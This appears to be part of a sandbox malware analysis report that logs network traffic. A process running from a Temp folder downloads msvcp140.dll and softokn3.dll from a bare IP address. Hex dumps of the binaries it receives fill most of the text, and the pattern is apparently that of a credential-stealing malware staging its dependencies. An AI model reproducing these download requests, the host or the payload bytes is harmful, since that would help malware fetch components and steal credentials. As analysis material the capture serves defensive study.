2024-07-26 10:57:32 UTC	16384	IN	Data Raw: 08 00 00 00 85 ff 0f 84 0b 06 00 00 83 fb 08 0f 86 cc 02 00 00 83 c3 0f 89 d8 83 e0 f0 89 44 24 1c c1 eb 04 c1 e3 05 8d 34 1f 83 c6 50 80 7f 3c 00 89 7c 24 10 89 5c 24 18 74 0a 83 7f 40 00 0f 84 29 06 00 00 8d 47 0c 89 44 24 20 50 ff 15 30 be 08 10 8b 16 85 d2 0f 84 38 01 00 00 83 7a 08 00 0f 84 2e 01 00 00 8b 4a 04 8b 74 8a 0c 85 f6 0f 84 eb 01 00 00 8b 5f 40 85 db 75 60 0f bc fe 89 cb c1 e3 05 09 fb 0f bb fe 8b 7c 24 10 8b 44 24 18 0f af 5c 07 58 8b 44 07 68 89 74 8a 0c 01 d0 01 c3 83 42 08 ff 85 db 0f 84 a2 05 00 00 8b 44 24 1c 01 47 2c ff 74 24 20 ff 15 b0 be 08 10 85 db 0f 84 93 05 00 00 8b 4c 24 60 31 e9 e8 51 e7 01 00 89 d8 8d 65 f4 5e 5f 5b 5d c3 89 4c 24 04 89 54 24 14 8b 0b 8b 7b 04 89 3c 24 0f a4 cf 17 89 c8 c1 e0 17 31 c8 8b 53 0c 33 3c 24 89 Data Ascii: D$4P<\|$\$t@)GD$ P08z.Jt_@u`\|$D$\XDhtBD$G,t$ L$`1Qe^_[]L$T${<$1S3<$
2024-07-26 10:57:32 UTC	16384	IN	Data Raw: fe 83 e0 01 09 c8 89 42 04 89 13 8d 44 24 58 e9 75 ff ff ff c7 44 24 3c 00 00 00 00 8b 5c 24 04 e9 a5 fe ff ff 31 d2 a8 10 0f 44 54 24 18 31 c9 39 f2 0f 97 c0 0f 82 e1 fe ff ff 88 c1 e9 d5 fe ff ff b0 01 e9 ec fd ff ff 8b 46 04 83 f8 01 0f 87 13 01 00 00 89 f2 8b 06 31 c9 85 c0 8b 74 24 1c 0f 84 39 04 00 00 8b 48 04 83 e1 fe 89 0a 89 d1 83 e1 fe 89 54 24 04 8b 50 04 83 e2 01 09 ca 89 50 04 8b 54 24 04 8b 52 04 83 e2 01 09 ca 89 50 04 8b 4c 24 04 80 49 04 01 83 60 04 01 89 c1 e9 fb 03 00 00 c7 44 24 28 00 00 00 00 e9 f9 fd ff ff 8d 74 24 54 89 f1 e8 37 0b fe ff 8b 1e e9 47 ff ff ff 83 e3 fe 89 58 04 89 d6 8b 1a 85 db 0f 84 fb 01 00 00 8b 43 04 83 e0 fe 89 06 89 f0 83 e0 fe 8b 4b 04 83 e1 01 09 c1 89 4b 04 8b 4e 04 89 c8 83 e0 fe 0f 84 c0 01 00 00 8b 10 83 Data Ascii: BD$XuD$<\$1DT$19F1t$9HT$PPT$RPL$I`D$(t$T7GXCKKN
2024-07-26 10:57:32 UTC	16384	IN	Data Raw: 00 00 00 0f 44 4c 24 04 31 db 39 c1 0f 97 c1 72 d1 88 cb 8b 50 04 83 e2 fe eb cc 83 e3 fe 89 1a 89 d6 83 e6 fe 8b 18 8b 48 04 83 e1 01 09 f1 89 48 04 85 db 0f 84 8d 0a 00 00 80 63 04 fe 8b 74 24 14 39 16 75 07 89 06 e9 69 ff ff ff 83 e0 fe 8b 56 04 83 e2 01 8d 0c 02 89 4e 04 85 c0 0f 84 25 0a 00 00 8b 08 83 e1 fe 09 d1 89 4e 04 89 30 8b 4e 04 83 e1 01 8b 50 04 83 e2 fe 09 ca 89 50 04 80 4e 04 01 85 ff 0f 84 1f 0a 00 00 39 37 0f 84 a0 05 00 00 e9 e0 05 00 00 8b 4c 24 1c 8b 19 89 d9 ba 00 f0 ff ff 21 d1 8b 70 08 21 d6 31 d2 39 f1 0f 97 c2 b9 ff ff ff ff 0f 42 d1 85 d2 0f 85 59 05 00 00 e9 c0 05 00 00 89 c1 85 d2 0f 85 c2 fe ff ff 8b 54 24 04 c7 02 00 00 00 00 8b 4c 24 08 c7 44 b1 14 01 00 00 00 83 fb 01 0f 84 17 02 00 00 89 10 8b 54 24 20 8b 44 24 48 85 c0 Data Ascii: DL$19rPHHct$9uiVN%N0NPPN97L$!p!19BYT$L$DT$ D$H

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.6	60815	5.75.212.60	443	2260	C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 10:57:33 UTC	242	OUT	GET /msvcp140.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 Host: 5.75.212.60 Connection: Keep-Alive Cache-Control: no-cache
2024-07-26 10:57:34 UTC	260	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Jul 2024 10:57:34 GMT Content-Type: application/octet-stream Content-Length: 450024 Connection: close Last-Modified: Friday, 26-Jul-2024 10:57:34 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
2024-07-26 10:57:34 UTC	16124	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_
2024-07-26 10:57:34 UTC	16384	IN	Data Raw: 2d 00 62 00 61 00 00 00 68 00 72 00 2d 00 68 00 72 00 00 00 68 00 75 00 2d 00 68 00 75 00 00 00 68 00 79 00 2d 00 61 00 6d 00 00 00 69 00 64 00 2d 00 69 00 64 00 00 00 69 00 73 00 2d 00 69 00 73 00 00 00 69 00 74 00 2d 00 63 00 68 00 00 00 69 00 74 00 2d 00 69 00 74 00 00 00 6a 00 61 00 2d 00 6a 00 70 00 00 00 6b 00 61 00 2d 00 67 00 65 00 00 00 6b 00 6b 00 2d 00 6b 00 7a 00 00 00 6b 00 6e 00 2d 00 69 00 6e 00 00 00 6b 00 6f 00 2d 00 6b 00 72 00 00 00 6b 00 6f 00 6b 00 2d 00 69 00 6e 00 00 00 00 00 6b 00 79 00 2d 00 6b 00 67 00 00 00 6c 00 74 00 2d 00 6c 00 74 00 00 00 6c 00 76 00 2d 00 6c 00 76 00 00 00 6d 00 69 00 2d 00 6e 00 7a 00 00 00 6d 00 6b 00 2d 00 6d 00 6b 00 00 00 6d 00 6c 00 2d 00 69 00 6e 00 00 00 6d 00 6e 00 2d 00 6d 00 6e 00 00 00 6d 00 72 Data Ascii: -bahr-hrhu-huhy-amid-idis-isit-chit-itja-jpka-gekk-kzkn-inko-krkok-inky-kglt-ltlv-lvmi-nzmk-mkml-inmn-mnmr
2024-07-26 10:57:34 UTC	16384	IN	Data Raw: 04 00 00 00 04 8b 00 10 18 8b 00 10 78 8a 00 10 e8 7b 00 10 04 7c 00 10 00 00 00 00 d8 4c 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 f4 8a 00 10 00 00 00 00 01 00 00 00 04 00 00 00 44 8b 00 10 58 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 14 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 34 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 84 8b 00 10 98 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 34 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 74 8b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 58 4d 06 10 c8 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 d8 8b 00 10 ec 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 58 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff Data Ascii: x{\|L@DX}0}}M@4}0}}4M@tXM}0}}XM
2024-07-26 10:57:34 UTC	16384	IN	Data Raw: 0f bf 45 fc d9 5d e8 d9 45 10 d9 45 e8 d9 c0 89 45 f4 de ea d9 c9 d9 5d e8 d9 45 e8 d9 55 10 d9 ee da e9 df e0 f6 c4 44 7b 05 dd d8 d9 45 10 8d 45 ec 50 8d 45 f8 50 d9 5d ec e8 fc fa ff ff 59 59 3b f3 0f 8c aa fd ff ff eb 10 8d 4e 01 d9 1c b7 3b cb 7d 06 d9 ee d9 5c b7 04 5e 8b c7 5f 5b c9 c3 55 8b ec 51 56 33 f6 39 75 14 7e 37 d9 ee 57 8b 7d 10 d9 04 b7 d9 5d fc d9 45 fc dd e1 df e0 dd d9 f6 c4 44 7b 1a 51 d9 1c 24 ff 75 0c ff 75 08 e8 97 fc ff ff d9 ee 83 c4 0c 46 3b 75 14 7c d2 dd d8 5f 8b 45 08 5e c9 c3 55 8b ec 51 51 8b 4d 0c 85 c9 75 04 d9 ee c9 c3 8b 55 08 83 f9 01 0f 84 9d 00 00 00 d9 02 d9 5d fc d9 45 fc d9 ee dd e1 df e0 f6 c4 44 0f 8b 82 00 00 00 d9 42 04 d9 5d fc d9 45 fc dd e1 df e0 f6 c4 44 7b 6e 83 f9 02 74 5d d9 42 08 d9 5d fc d9 45 fc dd Data Ascii: E]EEE]EUD{EEPEP]YY;N;}\^_[UQV39u~7W}]ED{Q$uuF;u\|_E^UQQMuU]EDB]ED{nt]B]E
2024-07-26 10:57:34 UTC	16384	IN	Data Raw: 0f b7 06 83 f8 61 74 05 83 f8 41 75 0f 03 f7 0f b7 06 66 3b c1 74 0e 66 3b c2 74 09 8b 45 08 33 db 8b 30 eb 43 03 f7 6a 04 5b 89 75 f8 66 83 3e 28 89 5d f4 75 32 8b de 03 df 68 07 01 00 00 0f b7 03 50 ff 15 ac 72 06 10 59 59 85 c0 75 e9 0f b7 03 83 f8 5f 74 e1 89 5d f8 8b 5d f4 83 f8 29 75 06 8b 75 f8 83 c6 02 8b 45 0c 85 c0 74 02 89 30 8b 45 08 5f 89 30 8b c3 5e 5b c9 c3 55 8b ec 83 ec 48 a1 c0 41 06 10 33 c5 89 45 fc 6b 4d 18 07 33 d2 8b 45 10 53 8b 5d 14 56 8b 75 0c 89 75 d0 89 45 b8 89 55 bc 89 55 c4 89 55 c0 89 4d cc 57 8b fa 83 f9 23 7e 06 6a 23 59 89 4d cc 6a 30 58 89 13 89 53 04 66 39 06 75 12 c7 45 c4 01 00 00 00 83 c6 02 66 39 06 74 f8 89 75 d0 0f b7 0e b8 b8 2d 00 10 89 4d c8 8b 4d cc c7 45 d4 16 00 00 00 8b 75 c8 66 39 30 8b 75 d0 74 0b 83 c0 Data Ascii: atAuf;tf;tE30Cj[uf>(]u2hPrYYu_t]])uuEt0E_0^[UHA3EkM3ES]VuuEUUUMW#~j#YMj0XSf9uEf9tu-MMEuf90ut
2024-07-26 10:57:34 UTC	16384	IN	Data Raw: 03 8d 41 1c c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 6a ff 68 09 e7 03 10 64 a1 00 00 00 00 50 a1 c0 41 06 10 33 c5 50 8d 45 f4 64 a3 00 00 00 00 e8 79 7b 00 00 50 e8 71 d8 ff ff 59 8b 40 0c 8b 4d f4 64 89 0d 00 00 00 00 59 c9 c3 cc cc 55 8b ec 83 79 38 00 8b 45 08 75 03 83 c8 04 ff 75 0c 50 e8 28 00 00 00 5d c2 08 00 cc cc cc cc 55 8b ec 6a 00 ff 75 08 e8 13 00 00 00 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 45 08 83 ec 1c 83 e0 17 89 41 0c 8b 49 10 56 23 c8 74 43 80 7d 0c 00 75 42 f6 c1 04 74 07 be 78 54 00 10 eb 0f be 90 54 00 10 f6 c1 02 75 05 be a8 54 00 10 8d 45 f8 6a 01 50 e8 f7 13 00 00 59 59 50 56 8d 4d e4 e8 bc e2 ff ff 68 a4 1a 04 10 8d 45 e4 50 eb 09 5e c9 c2 08 00 6a 00 6a 00 e8 f0 93 02 00 cc 53 57 Data Ascii: AUjhdPA3PEdy{PqY@MdYUy8EuuP(]Uju]UEAIV#tC}uBtxTTuTEjPYYPVMhEP^jjSW
2024-07-26 10:57:34 UTC	16384	IN	Data Raw: 89 45 fc 89 5f 10 e8 bd 54 02 00 8b 45 f8 83 c4 10 c6 04 1e 00 83 f8 10 72 0b 40 50 ff 37 e8 54 95 ff ff 59 59 89 37 8b c7 5f 5e 5b c9 c2 0c 00 e8 b3 be ff ff cc 55 8b ec 83 ec 0c 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d fc 3b c2 72 69 8b 43 14 8d 3c 11 57 8b cb 89 45 f4 e8 88 b1 ff ff 8b f0 8d 4e 01 51 e8 b2 94 ff ff 59 ff 75 18 89 7b 10 8d 4d 0c ff 75 14 8b 7d f4 89 45 f8 89 73 14 ff 75 10 ff 75 fc 83 ff 10 72 17 8b 33 56 50 e8 6b 03 00 00 8d 47 01 50 56 e8 d2 94 ff ff 59 59 eb 07 53 50 e8 56 03 00 00 8b 45 f8 5f 89 03 8b c3 5e 5b c9 c2 14 00 e8 25 be ff ff cc 55 8b ec 83 ec 10 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d f0 3b c2 0f 82 8f 00 00 00 8b 43 14 8d 3c 11 57 8b cb 89 45 fc e8 f6 b0 ff ff 8b f0 8d 4e 01 51 e8 Data Ascii: E_TEr@P7TYY7_^[UUSVWK+M;riC<WENQYu{Mu}Esuur3VPkGPVYYSPVE_^[%UUSVWK+M;C<WENQ
2024-07-26 10:57:34 UTC	16384	IN	Data Raw: 01 75 04 3b d7 74 3a 8b 5d 08 6a 04 59 89 4d d4 53 33 c0 03 04 cb 52 13 7c cb 04 56 57 50 e8 f1 02 02 00 5b 8b 5d 08 8b f9 8b 4d d4 8b 75 d8 89 54 cb 04 8b 55 e8 89 04 cb 83 e9 01 89 4d d4 79 cf 5f 5e 5b c9 c3 55 8b ec 51 56 8b 75 14 33 d2 85 f6 7e 5f 53 8b 5d 08 29 5d 10 57 8b fb 89 75 fc 8b 5d 10 8b 0c 3b 03 0f 8b 44 3b 04 13 47 04 03 ca 89 0f 8d 7f 08 83 d0 00 8b d0 89 57 fc 83 67 fc 00 83 ee 01 75 dc 0b c6 8b 5d 08 74 22 8b 4d fc 3b 4d 0c 7d 1a 01 14 cb 8b 54 cb 04 13 d6 33 f6 89 54 cb 04 8b c2 21 74 cb 04 41 0b c6 75 e1 5f 5b 5e c9 c3 55 8b ec 8b 55 08 56 8b 75 0c 83 c2 f8 8d 14 f2 8b 02 0b 42 04 75 0b 8d 52 f8 4e 8b 0a 0b 4a 04 74 f5 8b c6 5e 5d c3 55 8b ec 53 56 33 db 33 f6 39 5d 0c 7e 30 57 8b 7d 08 ff 75 14 ff 75 10 ff 74 f7 04 ff 34 f7 e8 73 03 Data Ascii: u;t:]jYMS3R\|VWP[]MuTUMy_^[UQVu3~_S])]Wu];D;GWgu]t"M;M}T3T!tAu_[^UUVuBuRNJt^]USV339]~0W}uut4s
2024-07-26 10:57:34 UTC	16384	IN	Data Raw: cc cc cc cc 55 8b ec 51 8b 45 0c 56 8b f1 89 75 fc 89 46 04 c7 06 7c 69 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 8b 45 0c 56 8b f1 89 75 fc 89 46 04 c7 06 e8 65 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 56 8b f1 ff 76 0c c7 06 4c 68 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 56 8b f1 ff 76 0c c7 06 8c 66 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc 56 8b f1 c7 06 50 69 00 10 e8 e2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 c7 06 90 67 00 10 e8 c2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 ff 76 08 c7 06 7c 69 00 Data Ascii: UQEVuF\|ifrjFqY^UQEVuFefrjFqY^VvLhqY(R^VvfqY(R^VPiq(R^Vgq(R^Vv\|i
2024-07-26 10:57:34 UTC	16384	IN	Data Raw: 73 00 00 84 c0 0f 85 d3 00 00 00 8b 5d ec 80 7f 04 00 75 07 8b cf e8 85 26 00 00 0f b7 47 06 50 ff b5 74 ff ff ff e8 9a a8 ff ff 59 59 83 f8 0a 73 3c 8a 80 2c 6a 00 10 8b 4d 8c 88 85 64 ff ff ff ff b5 64 ff ff ff e8 5f 18 ff ff 8b 4d d8 8d 45 d8 83 fb 10 72 02 8b c1 80 3c 30 7f 74 4c 8d 45 d8 83 fb 10 72 02 8b c1 fe 04 30 eb 3a 8d 45 d8 83 fb 10 72 03 8b 45 d8 80 3c 30 00 74 45 80 7f 04 00 0f b7 47 06 75 0b 8b cf e8 10 26 00 00 0f b7 47 06 66 3b 85 60 ff ff ff 75 27 6a 00 8d 4d d8 e8 04 18 ff ff 46 8b 5d ec 8b cf e8 24 11 00 00 ff 75 98 8b cf e8 de 72 00 00 84 c0 0f 84 4a ff ff ff 8b 5d 90 85 f6 74 13 83 7d ec 10 8d 45 d8 72 03 8b 45 d8 80 3c 30 00 7e 52 46 8a 45 a7 83 7d d4 10 8d 55 c0 72 03 8b 55 c0 84 c0 75 49 85 f6 74 5e 8a 0a 80 f9 7f 74 57 83 ee 01 Data Ascii: s]u&GPtYYs<,jMdd_MEr<0tLEr0:ErE<0tEGu&Gf;`u'jMF]$urJ]t}ErE<0~RFE}UrUuIt^tW

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.6	60817	5.75.212.60	443	2260	C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 10:57:35 UTC	242	OUT	GET /softokn3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 Host: 5.75.212.60 Connection: Keep-Alive Cache-Control: no-cache
2024-07-26 10:57:36 UTC	260	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Jul 2024 10:57:36 GMT Content-Type: application/octet-stream Content-Length: 257872 Connection: close Last-Modified: Friday, 26-Jul-2024 10:57:36 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
2024-07-26 10:57:36 UTC	16124	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSw
2024-07-26 10:57:36 UTC	16384	IN	Data Raw: 85 f0 fe ff ff 00 00 00 00 8d 85 ec fe ff ff 89 85 f4 fe ff ff c7 85 f8 fe ff ff 04 00 00 00 8d 85 f0 fe ff ff 6a 01 50 53 57 e8 85 af 00 00 83 c4 10 89 c6 85 c0 75 3f 8b 85 ec fe ff ff 83 c0 fd 83 f8 01 77 25 be 30 00 00 00 83 3d 28 9a 03 10 00 75 23 83 3d 50 90 03 10 00 74 0e be 01 01 00 00 f6 05 20 9a 03 10 01 74 0c 53 57 e8 e2 b9 00 00 83 c4 08 89 c6 83 3d 2c 9a 03 10 00 0f 84 5e ff ff ff 8b 85 ec fe ff ff 83 c0 fe 83 f8 02 0f 87 4c ff ff ff 56 53 57 68 85 6b 03 10 68 00 01 00 00 8d 85 f0 fe ff ff 50 ff 15 1c 7c 03 10 83 c4 18 e9 2a ff ff ff cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 08 01 00 00 a1 14 90 03 10 31 e8 89 45 f0 c7 85 ec fe ff ff 00 00 00 00 be 30 00 00 00 83 3d 28 9a 03 10 00 74 17 8b 4d f0 31 e9 e8 28 8b 02 00 89 f0 81 Data Ascii: jPSWu?w%0=(u#=Pt tSW=,^LVSWhkhP\|*USWV1E0=(tM1(
2024-07-26 10:57:36 UTC	16384	IN	Data Raw: 03 45 dc 56 8d 4d ec 51 50 57 e8 55 9e ff ff 83 c4 10 85 c0 0f 85 6b 03 00 00 57 e8 c4 9d ff ff 83 c4 04 ff 75 e8 53 57 e8 f7 9d ff ff 83 c4 0c ff 75 e8 8d 45 e8 50 53 57 e8 26 9e ff ff 83 c4 10 85 c0 0f 85 3c 03 00 00 8b 4d c8 83 c1 01 8b 75 e4 8b 45 dc 01 f0 3b 4d c0 0f 85 6c ff ff ff 31 f6 e9 20 03 00 00 31 f6 ff 35 30 9a 03 10 ff 15 f0 7b 03 10 83 c4 04 a1 34 9a 03 10 85 c0 74 15 6a 01 50 e8 57 4e 02 00 83 c4 08 c7 05 34 9a 03 10 00 00 00 00 a1 38 9a 03 10 85 c0 74 15 6a 01 50 e8 39 4e 02 00 83 c4 08 c7 05 38 9a 03 10 00 00 00 00 a1 3c 9a 03 10 85 c0 74 15 6a 01 50 e8 1b 4e 02 00 83 c4 08 c7 05 3c 9a 03 10 00 00 00 00 56 e8 e8 4d 02 00 83 c4 04 a3 34 9a 03 10 8b 47 38 a3 40 9a 03 10 8b 47 28 a3 44 9a 03 10 8b 47 2c a3 48 9a 03 10 8d 47 04 50 e8 bf 4d Data Ascii: EVMQPWUkWuSWuEPSW&<MuE;Ml1 150{4tjPWN48tjP9N8<tjPN<VM4G8@G(DG,HGPM
2024-07-26 10:57:36 UTC	16384	IN	Data Raw: 88 41 02 0f b6 41 03 d1 e8 8a 80 68 f9 02 10 88 41 03 0f b6 41 04 d1 e8 8a 80 68 f9 02 10 88 41 04 0f b6 41 05 d1 e8 8a 80 68 f9 02 10 88 41 05 0f b6 41 06 d1 e8 8a 80 68 f9 02 10 88 41 06 0f b6 41 07 d1 e8 8a 80 68 f9 02 10 88 41 07 ba 01 01 01 01 8b 31 31 d6 33 51 04 b8 01 00 00 00 09 f2 0f 84 37 01 00 00 ba 1f 1f 1f 1f 33 11 be 0e 0e 0e 0e 33 71 04 09 d6 0f 84 20 01 00 00 ba e0 e0 e0 e0 33 11 be f1 f1 f1 f1 33 71 04 09 d6 0f 84 09 01 00 00 ba fe fe fe fe 8b 31 31 d6 33 51 04 09 f2 0f 84 f5 00 00 00 ba 01 fe 01 fe 8b 31 31 d6 33 51 04 09 f2 0f 84 e1 00 00 00 ba fe 01 fe 01 8b 31 31 d6 33 51 04 09 f2 0f 84 cd 00 00 00 ba 1f e0 1f e0 33 11 be 0e f1 0e f1 33 71 04 09 d6 0f 84 b6 00 00 00 ba e0 1f e0 1f 33 11 be f1 0e f1 0e 33 71 04 09 d6 0f 84 9f 00 00 00 Data Ascii: AAhAAhAAhAAhAAhA113Q733q 33q113Q113Q113Q33q33q
2024-07-26 10:57:36 UTC	16384	IN	Data Raw: 84 30 07 00 00 83 7b 08 14 0f 84 43 01 00 00 e9 21 07 00 00 3d 50 06 00 00 0f 8f aa 01 00 00 3d 51 05 00 00 74 2d 3d 52 05 00 00 74 12 3d 55 05 00 00 0f 85 0a 07 00 00 c7 47 0c 01 00 00 00 83 7b 04 00 0f 84 ec 06 00 00 83 7b 08 10 0f 85 e2 06 00 00 c7 47 18 10 00 00 00 83 7c 24 24 25 0f 85 fb 07 00 00 6a 11 ff 74 24 30 e8 44 c7 00 00 83 c4 08 85 c0 0f 84 78 09 00 00 89 c7 31 c0 81 3b 51 05 00 00 0f 95 c0 ff 77 1c 8b 4d 20 51 50 ff 73 04 ff 77 18 e8 09 1e ff ff 83 c4 14 8b 4c 24 28 89 41 64 57 e8 a9 c6 00 00 83 c4 04 8b 44 24 28 83 78 64 00 0f 84 bf 08 00 00 83 7d 20 00 b9 60 2a 00 10 ba 20 2a 00 10 0f 44 d1 89 50 74 c7 80 84 00 00 00 e0 29 00 10 e9 eb 08 00 00 3d 09 21 00 00 0f 8e 1c 02 00 00 3d 0a 21 00 00 0f 84 08 02 00 00 3d 0b 21 00 00 0f 84 23 02 00 Data Ascii: 0{C!=P=Qt-=Rt=UG{{G\|$$%jt$0Dx1;QwM QPswL$(AdWD$(xd} `* *DPt)=!=!=!#
2024-07-26 10:57:36 UTC	16384	IN	Data Raw: 5d c3 cc cc 55 89 e5 53 57 56 83 ec 10 a1 14 90 03 10 31 e8 89 45 f0 ff 75 08 e8 35 ab 00 00 83 c4 04 85 c0 74 5f 89 c6 8b 78 38 bb 91 00 00 00 85 ff 74 56 83 3f 03 75 51 8b 4d 18 8b 47 04 83 7d 14 00 74 59 8b 5d 0c 85 c0 74 64 89 ce 8b 4d 08 89 da 6a 03 ff 75 10 e8 47 fa ff ff 83 c4 08 89 c3 85 c0 75 24 56 ff 75 14 ff 75 08 e8 72 fd ff ff 83 c4 0c 89 c6 8b 4d f0 31 e9 e8 a3 8b 01 00 89 f0 eb 11 bb b3 00 00 00 8b 4d f0 31 e9 e8 90 8b 01 00 89 d8 83 c4 10 5e 5f 5b 5d c3 85 c0 74 06 83 7f 68 00 74 5a 81 c7 90 00 00 00 eb 55 8b 01 89 45 e8 8b 47 64 89 45 e4 8b 4f 74 ff 15 00 a0 03 10 8d 45 ec ff 75 10 53 ff 75 e8 50 ff 75 14 ff 75 e4 ff d1 83 c4 18 85 c0 74 32 e8 a1 8d 01 00 50 e8 eb 84 00 00 83 c4 04 8b 55 ec 8b 4d 18 89 11 bb 50 01 00 00 3d 50 01 00 00 74 Data Ascii: ]USWV1Eu5t_x8tV?uQMG}tY]tdMjuGu$VuurM1M1^_[]thtZUEGdEOtEuSuPuut2PUMP=Pt
2024-07-26 10:57:36 UTC	16384	IN	Data Raw: 75 20 85 f6 7e 7a 8b 7d 1c 83 c7 08 c7 45 d8 00 00 00 00 c7 45 d4 04 00 00 00 eb 18 0f 1f 84 00 00 00 00 00 8b 47 fc 8b 00 89 45 d8 83 c7 0c 83 c6 ff 74 5a 8b 47 f8 85 c0 74 19 3d 61 01 00 00 74 e2 8b 4f fc eb 15 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 8b 4f fc 8b 11 89 55 d4 ff 37 51 50 ff 75 dc e8 8c 53 00 00 83 c4 10 85 c0 74 bd 89 c3 e9 80 01 00 00 bf 02 00 00 00 e9 83 01 00 00 c7 45 d4 04 00 00 00 c7 45 d8 00 00 00 00 8b 45 10 8b 4d 0c 83 ec 1c 0f 28 05 40 fb 02 10 0f 11 44 24 0c 89 44 24 08 89 4c 24 04 8b 45 08 89 04 24 e8 fe 7c ff ff 83 c4 1c 85 c0 74 0c 89 c3 ff 75 dc e8 7d 5a 00 00 eb 3d 8b 7d 18 8b 5d 14 57 e8 8b 4d 01 00 83 c4 04 89 c6 89 7d ec 8d 45 ec 50 56 57 53 ff 75 08 e8 e8 9a ff ff 83 c4 14 85 c0 74 26 89 c3 ff 75 dc e8 47 5a 00 00 83 c4 Data Ascii: u ~z}EEGEtZGt=atOf.OU7QPuStEEEM(@D$D$L$E$\|tu}Z=}]WM}EPVWSut&uGZ
